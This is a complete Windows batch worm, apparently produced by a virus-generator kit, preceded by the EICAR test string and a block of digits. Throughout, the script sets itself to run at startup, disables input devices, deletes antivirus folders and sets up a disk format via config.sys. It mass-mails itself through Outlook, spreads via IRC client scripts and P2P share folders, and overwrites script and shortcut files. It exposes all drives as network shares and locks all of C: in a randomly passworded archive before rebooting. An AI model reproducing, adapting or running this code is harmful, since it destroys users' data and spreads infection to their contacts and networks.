X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
778576076030759558832645425492756962776911541223526084226173162467785760760307595588326454254927569627769115412235260
595588326454254927569627769115412235260842261731624677857607603075955883264542549275696277691154122352609115412235260
549275696277691154122352608422617316246778576076030759558832645425492756962776911541223526084226173162467785760760307
911541223526084226173162467785760760307595588326454254927569627769115412235260842261731624677857607603075955883264542
842261731624677857607603075955883264542549275696277691154122352608422617316246778576076030759558832645425492756962776
778576076030759558832645425492756962776911541223526084226173162467785760760307595588326454254927569627769115412235260
595588326454254927569627769115412235260842261731624677857607603075955883264542549275696277691154122352609115412235260
549275696277691154122352608422617316246778576076030759558832645425492756962776911541223526084226173162467785760760307
911541223526084226173162467785760760307595588326454254927569627769115412235260842261731624677857607603075955883264542
842261731624677857607603075955883264542549275696277691154122352608422617316246778576076030759558832645425492756962776
:: Generated by Dangerous Menu [DvL]
@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
md %windir%\system\egfvwmcv>nul
copy %0 %windir%\system\egfvwmcv\tmpdelis.bat>nul
set jpdxaact=deltree/y c:\
set pfaan=progra~1\
echo.REGEDIT4>%windir%\system\egfvwmcv\egfvwmcv.reg
echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]>>%windir%\system\egfvwmcv\egfvwmcv.reg
echo."System Logging"="C:\WINDOWS\system\egfvwmcv\tmpdelis.bat">>%windir%\system\egfvwmcv\egfvwmcv.reg
regedit /s %windir%\system\egfvwmcv\egfvwmcv.reg
rundll32 mouse,disable
rundll32 keyboard,disable
%jpdxaact%antiba~1\>nul
%jpdxaact%antiba~2\>nul
%jpdxaact%antiba~1.1\>nul
%jpdxaact%antiba~1.2\>nul
%jpdxaact%antiba~1.3\>nul
%jpdxaact%antiba~1.4\>nul
%jpdxaact%antiba~1.5\>nul
%jpdxaact%antiba~1.6\>nul
%jpdxaact%antiba~1.7\>nul
%jpdxaact%antiba~1.8\>nul
%jpdxaact%antivi~1\>nul
%jpdxaact%antivi~2\>nul
%jpdxaact%antiviru\>nul
%jpdxaact%avg\>nul
%jpdxaact%avp\>nul
%jpdxaact%avp30\>nul
%jpdxaact%avx\>nul
%jpdxaact%avpers~1\>nul
%jpdxaact%bitdef~1\>nul
%jpdxaact%bitdef~2\>nul
%jpdxaact%comman~1\>nul
%jpdxaact%cleancih\>nul
%jpdxaact%esafen\>nul
%jpdxaact%findvi~1\>nul
%jpdxaact%f-macro\>nul
%jpdxaact%f-prot\>nul
%jpdxaact%f-prot95\>nul
%jpdxaact%f-secu~1\>nul
%jpdxaact%fwin\>nul
%jpdxaact%fwin32\>nul
%jpdxaact%inocul~1\>nul
%jpdxaact%inocul~2\>nul
%jpdxaact%kasper~1\>nul
%jpdxaact%kasper~2\>nul
%jpdxaact%mcafee\>nul
%jpdxaact%mcafee~1\>nul
%jpdxaact%msav\>nul
%jpdxaact%norman\>nul
%jpdxaact%norton~1\>nul
%jpdxaact%norton~2\>nul
%jpdxaact%pav\>nul
%jpdxaact%pccill~1\>nul
%jpdxaact%pc-cil~1\>nul
%jpdxaact%rav\>nul
%jpdxaact%softwin\>nul
%jpdxaact%tbav\>nul
%jpdxaact%tbavw95\>nul
%jpdxaact%toolkit\>nul
%jpdxaact%trendm~1\>nul
%jpdxaact%trex\>nul
%jpdxaact%virus\>nul
%jpdxaact%vpc\>nul
%jpdxaact%vs95\>nul
%jpdxaact%zonela~1\>nul
%jpdxaact%zonela~2\>nul
%jpdxaact%%pfaan%antiba~1\>nul
%jpdxaact%%pfaan%antiba~2\>nul
%jpdxaact%%pfaan%antiba~1.1\>nul
%jpdxaact%%pfaan%antiba~1.2\>nul
%jpdxaact%%pfaan%antiba~1.3\>nul
%jpdxaact%%pfaan%antiba~1.4\>nul
%jpdxaact%%pfaan%antiba~1.5\>nul
%jpdxaact%%pfaan%antiba~1.6\>nul
%jpdxaact%%pfaan%antiba~1.7\>nul
%jpdxaact%%pfaan%antiba~1.8\>nul
%jpdxaact%%pfaan%antivi~1\>nul
%jpdxaact%%pfaan%antivi~2\>nul
%jpdxaact%%pfaan%avg\>nul
%jpdxaact%%pfaan%avp\>nul
%jpdxaact%%pfaan%avx\>nul
%jpdxaact%%pfaan%avx2000\>nul
%jpdxaact%%pfaan%avpers~1\>nul
%jpdxaact%%pfaan%bitdef~1\>nul
%jpdxaact%%pfaan%bitdef~2\>nul
%jpdxaact%%pfaan%comman~1\>nul
%jpdxaact%%pfaan%common~1\avpsha~1\>nul
%jpdxaact%%pfaan%common~1\symant~1\>nul
%jpdxaact%%pfaan%datafe~1\>nul
%jpdxaact%%pfaan%deerfi~1.com\>nul
%jpdxaact%%pfaan%f-prot\>nul
%jpdxaact%%pfaan%f-prot95\>nul
%jpdxaact%%pfaan%findvi~1\>nul
%jpdxaact%%pfaan%f-secu~1\>nul
%jpdxaact%%pfaan%f-secure\>nul
%jpdxaact%%pfaan%fsi\>nul
%jpdxaact%%pfaan%fwin\>nul
%jpdxaact%%pfaan%fwin32\>nul
%jpdxaact%%pfaan%grisoft\>nul
%jpdxaact%%pfaan%inocul~1\>nul
%jpdxaact%%pfaan%inocul~2\>nul
%jpdxaact%%pfaan%intern~2\>nul
%jpdxaact%%pfaan%kasper~1\>nul
%jpdxaact%%pfaan%kasper~2\>nul
%jpdxaact%%pfaan%mcafee\>nul
%jpdxaact%%pfaan%mcafee~1\>nul
%jpdxaact%%pfaan%mindso~1\>nul
%jpdxaact%%pfaan%norman\>nul
%jpdxaact%%pfaan%norton~1\>nul
%jpdxaact%%pfaan%norton~2\>nul
%jpdxaact%%pfaan%pandas~1\>nul
%jpdxaact%%pfaan%protec~1\>nul
%jpdxaact%%pfaan%protec~2\>nul
%jpdxaact%%pfaan%quickh~1\>nul
%jpdxaact%%pfaan%rav\>nul
%jpdxaact%%pfaan%signal9\>nul
%jpdxaact%%pfaan%softwin\>nul
%jpdxaact%%pfaan%spysto~1\>nul
%jpdxaact%%pfaan%symant~1\>nul
%jpdxaact%%pfaan%tbav\>nul
%jpdxaact%%pfaan%tinype~1\>nul
%jpdxaact%%pfaan%trendm~1\>nul
%jpdxaact%%pfaan%trendp~1\>nul
%jpdxaact%%pfaan%trojan~1\>nul
%jpdxaact%%pfaan%trojan~2\>nul
%jpdxaact%%pfaan%virusm~1.0\>nul
%jpdxaact%%pfaan%zonela~1\>nul
%jpdxaact%%pfaan%zonela~2\>nul
echo.time 00:00:00,00>>c:\autoexec.bat
echo.date 80-01-01>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat
echo.[menu]>c:\config.sys
echo.menuitem=pfaan>>c:\config.sys
echo.>>c:\config.sys
echo.[pfaan]>>c:\config.sys
echo.buffers=1>>c:\config.sys
echo.files=1>>c:\config.sys
echo.lastdrive=A>>c:\config.sys
echo.set path=%jpdxaact%>>c:\config.sys
echo.set temp=A:\>>c:\config.sys
echo.set windir=format c:/u/q/autotest>>c:\config.sys
set myd=adress
set zngcpn=attachments.add
copy %0 c:\egfvwmcv.bat>nul
echo.set abc=createobject("outlook.application")>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.set bac=abc.getnamespace("MAPI")>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.set cab=bac.%myd%lists>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.for each d in cab>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.for e=1 to d.%myd%entries.count>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.dim f>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.set f=abc.createitem(0)>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.to=d.%myd%entries(e).%myd%>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.subject="">>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.body=""&d.%myd%entries(e).name&""&vbcrlf>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.body=f.body&""&vbcrlf>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.body=f.body&""&vbcrlf&""&f>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.%zngcpn% "c:\egfvwmcv.bat",1,len(f.body),"egfvwmcv">>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.importance=2>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.send>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.next>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.next>>%windir%\system\egfvwmcv\egfvwmcv.vbs
cscript %windir%\system\egfvwmcv\egfvwmcv.vbs
echo.[script]>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.n0=on 1:JOIN:#:{>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.n1=/if ( $nick == $me ) { halt }>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.n2=/dcc send $nick %windir%\system\egfvwmcv\tmpdelis.bat>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.n3=}>>%windir%\system\egfvwmcv\egfvwmcv.ini
%jpdxaact%mirc\script.ini>nul
%jpdxaact%mirc32\script.ini>nul
%jpdxaact%%pfaan%mirc\script.ini>nul
%jpdxaact%%pfaan%mirc32\script.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\mirc\script.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\mirc32\script.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\%pfaan%mirc\script.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\%pfaan%mirc32\script.ini>nul
echo.[Levels]>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.Enabled=1>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.Count=1>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.Level1=egfvwmcv>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.egfvwmcvEnabled=1>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.[egfvwmcv]>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.User1=*!*@*>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.UserCount=1>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.Event1=ON PART:#:/dcc send $nick %windir%\system\egfvwmcv\tmpdelis.bat | /msg $nick WinUpdate>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.Event2=ON JOIN:#:/dcc send $nick %windir%\system\egfvwmcv\tmpdelis.bat | /notice $nick Potential>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.Event3=ON TEXT:*fuck*:*:/dcc send $nick %windir%\system\egfvwmcv\tmpdelis.bat>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.Event4=ON TEXT:*sex*:*:/dcc send $nick %windir%\system\egfvwmcv\tmpdelis.bat>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.Event5=ON TEXT:*girl*:*:/dcc send $nick %windir%\system\egfvwmcv\tmpdelis.bat>>%windir%\system\egfvwmcv\egfvwmcv.ini
echo.EventCount=5>>%windir%\system\egfvwmcv\egfvwmcv.ini
%jpdxaact%pirch\events.ini>nul
%jpdxaact%pirch98\events.ini>nul
%jpdxaact%pirch32\events.ini>nul
%jpdxaact%%pfaan%pirch\events.ini>nul
%jpdxaact%%pfaan%pirch98\events.ini>nul
%jpdxaact%%pfaan%pirch32\events.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\pirch\events.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\pirch98\events.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\pirch32\events.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\%pfaan%pirch\events.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\%pfaan%pirch98\events.ini>nul
copy %windir%\system\egfvwmcv\egfvwmcv.ini c:\%pfaan%pirch32\events.ini>nul
echo.set z=CreateObject("wscript.shell")>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.z.regwrite "HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick %windir%\system\egfvwmcv\tmpdelis.bat">>%windir%\system\egfvwmcv\egfvwmcv.vbs
cscript %windir%\system\egfvwmcv\egfvwmcv.vbs
copy %0 c:\download\egfvwmcv.bat>nul
copy %0 c:\kazaa\myshar~1\egfvwmcv.bat>nul
copy %0 c:\mydown~1\egfvwmcv.bat>nul
copy %0 c:\mydocu~1\egfvwmcv.bat>nul
copy %0 c:\%pfaan%applej~1\incoming\egfvwmcv.bat>nul
copy %0 c:\%pfaan%bearsh~1\shared\egfvwmcv.bat>nul
copy %0 c:\%pfaan%edonke~1\incoming\egfvwmcv.bat>nul
copy %0 c:\%pfaan%emule\incoming\egfvwmcv.bat>nul
copy %0 c:\%pfaan%grokster\mygrok~1\egfvwmcv.bat>nul
copy %0 c:\%pfaan%icq\shared~1\egfvwmcv.bat>nul
copy %0 c:\%pfaan%kazaa\myshar~1\egfvwmcv.bat>nul
copy %0 c:\%pfaan%kazaal~1\myshar~1\egfvwmcv.bat>nul
copy %0 c:\%pfaan%kmd\myshar~1\egfvwmcv.bat>nul
copy %0 c:\%pfaan%limewire\shared\egfvwmcv.bat>nul
copy %0 c:\%pfaan%morpheus\myshar~1\egfvwmcv.bat>nul
copy %0 c:\%pfaan%overnet\bundles\egfvwmcv.bat>nul
echo.set a=Wscript.CreateObject("WScript.Shell")>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.set b=a.CreateShortcut("C:\WINDOWS\system\egfvwmcv\egfvwmcv.lnk")>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.TargetPath=a.ExpandEnvironmentStrings("C:\WINDOWS\system\egfvwmcv\tmpdelis.bat")>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.WindowStyle=4>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.Save>>%windir%\system\egfvwmcv\egfvwmcv.vbs
cscript %windir%\system\egfvwmcv\egfvwmcv.vbs
for %%b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %windir%\*.lnk %path%\*.lnk %windir%\desktop\*.lnk %windir%\system\*.lnk) do attrib -r -h -s -a %%b
for %%b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %windir%\*.lnk %path%\*.lnk %windir%\desktop\*.lnk %windir%\system\*.lnk) do copy %windir%\system\egfvwmcv\egfvwmcv.lnk %%b /y
for %%b in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%b:\nul copy %windir%\egfvwmcv\egfvwmcv.lnk %%b:\funny.lnk /y
for %%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do attrib -r -h -s -a %%c
for %%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do copy %windir%\system\egfvwmcv\tmpdelis.bat %%c /y
for %%c in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%c:\nul copy %windir%\system\egfvwmcv\tmpdelis.bat %%c:\_tmpcfg.bat /y
echo.SHELL "%windir%\system\egfvwmcv\tmpdelis.bat">%windir%\system\egfvwmcv\egfvwmcv.bas
echo.END>>%windir%\system\egfvwmcv\egfvwmcv.bas
for %%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do attrib -r -h -s -a %%d
for %%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do copy %windir%\system\egfvwmcv\egfvwmcv.bas %%d /y
for %%d in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%d:\nul copy %windir%\system\egfvwmcv\egfvwmcv.bas %%d:\tmp_.bas /y
echo.set a=wscript.createobject("wscript.shell")>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.a.run "C:\WINDOWS\system\egfvwmcv\tmpdelis.bat", VBHide>>%windir%\system\egfvwmcv\egfvwmcv.vbs
for %%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do attrib -r -h -s -a %%e
for %%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do copy %windir%\system\egfvwmcv\egfvwmcv.vbs %%e /y
for %%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%e:\nul copy %windir%\system\egfvwmcv\egfvwmcv.vbs %%e:\tmp_.vbs /y
echo.a=wscript.createobject("wscript.shell");>%windir%\system\egfvwmcv\egfvwmcv.js
echo.a.Run("C:\WINDOWS\system\egfvwmcv\tmpdelis.bat");>>%windir%\system\egfvwmcv\egfvwmcv.js
for %%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do attrib -r -h -s -a %%f
for %%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do copy %windir%\system\egfvwmcv\egfvwmcv.js %%f /y
for %%f in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%f:\nul copy %windir%\system\egfvwmcv\egfvwmcv.js %%f:\tmp_.js /y
echo.REGEDIT4>%windir%\system\egfvwmcv\egfvwmcv.reg
echo.>>%windir%\system\egfvwmcv\egfvwmcv.reg
echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan]>>%windir%\system\egfvwmcv\egfvwmcv.reg
echo.>>%windir%\system\egfvwmcv\egfvwmcv.reg
echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\%%1$]>>%windir%\system\egfvwmcv\egfvwmcv.reg
echo."Flags"=dword:00000302>>%windir%\system\egfvwmcv\egfvwmcv.reg
echo."Parm1enc"=hex:>>%windir%\system\egfvwmcv\egfvwmcv.reg
echo."Parm2enc"=hex:>>%windir%\system\egfvwmcv\egfvwmcv.reg
echo."Path"="%%1:\\">>%windir%\system\egfvwmcv\egfvwmcv.reg
echo."Remark"="">>%windir%\system\egfvwmcv\egfvwmcv.reg
echo."Type"=dword:00000000>>%windir%\system\egfvwmcv\egfvwmcv.reg
for %%g in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;t;s;t;u;v;w;x;y;z;a) do start regedit /s %windir%\system\egfvwmcv\egfvwmcv.reg %%g>nul
set £=md %windir%\desktop\
%£%£00>nul | %£%£01>nul | %£%£02>nul | %£%£03>nul
%£%£04>nul | %£%£05>nul | %£%£06>nul | %£%£07>nul
%£%£08>nul | %£%£09>nul | %£%£10>nul | %£%£11>nul
%£%£12>nul | %£%£13>nul | %£%£14>nul | %£%£15>nul
%£%£16>nul | %£%£17>nul | %£%£18>nul | %£%£19>nul
%£%£20>nul | %£%£21>nul | %£%£22>nul | %£%£23>nul
%£%£24>nul | %£%£25>nul | %£%£26>nul | %£%£27>nul
%£%£28>nul | %£%£29>nul | %£%£30>nul | %£%£31>nul
%£%£32>nul | %£%£33>nul | %£%£34>nul | %£%£35>nul
%£%£36>nul | %£%£37>nul | %£%£38>nul | %£%£39>nul
%£%£40>nul | %£%£41>nul | %£%£42>nul | %£%£43>nul
%£%£44>nul | %£%£45>nul | %£%£46>nul | %£%£47>nul
%£%£48>nul | %£%£49>nul | %£%£50>nul | %£%£51>nul
%£%£52>nul | %£%£53>nul | %£%£54>nul | %£%£55>nul
%£%£56>nul | %£%£57>nul | %£%£58>nul | %£%£59>nul
%£%£60>nul | %£%£61>nul | %£%£62>nul | %£%£63>nul
%£%£64>nul | %£%£65>nul | %£%£66>nul | %£%£67>nul
%£%£68>nul | %£%£69>nul | %£%£70>nul | %£%£71>nul
%£%£72>nul | %£%£73>nul | %£%£74>nul | %£%£75>nul
%£%£76>nul | %£%£77>nul | %£%£78>nul | %£%£79>nul
%£%£80>nul | %£%£81>nul | %£%£82>nul | %£%£83>nul
%£%£84>nul | %£%£85>nul | %£%£86>nul | %£%£87>nul
%£%£88>nul | %£%£89>nul | %£%£90>nul | %£%£91>nul
%£%£92>nul | %£%£93>nul | %£%£94>nul | %£%£95>nul
%£%£96>nul | %£%£97>nul | %£%£98>nul | %£%£99>nul
for %%h in (%windir%\desktop\£*) do attrib +r +h +s +a %%h
echo.Randomize>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.Set a=CreateObject("scripting.filesystemobject")>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.c=Int((99999999*Rnd)+1)>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.d=Int((99999999*Rnd)+1)>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.Set b=a.CreateTextFile (d&".bat")>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.Set f=CreateObject("WScript.Shell")>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.e=Int((99999999*Rnd)+1)>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.Writeline "ctty nul">>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.Writeline "if not exist c:\%pfaan%winrar\rar.exe goto end">>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.Writeline "c:\%pfaan%winrar\rar.exe a -p"&c&" -r -m5 -o+ -inul -idp -y "&e&".rar c:\*.* ">>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.Writeline "ctty con">>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.Writeline ":end">>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.Writeline "cls">>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.b.Close>>%windir%\system\egfvwmcv\egfvwmcv.vbs
echo.f.Run d&".bat">>%windir%\system\egfvwmcv\egfvwmcv.vbs
cscript %windir%\system\egfvwmcv\egfvwmcv.vbs
rundll32 shell32.dll,SHExitWindowsEx 2
cls
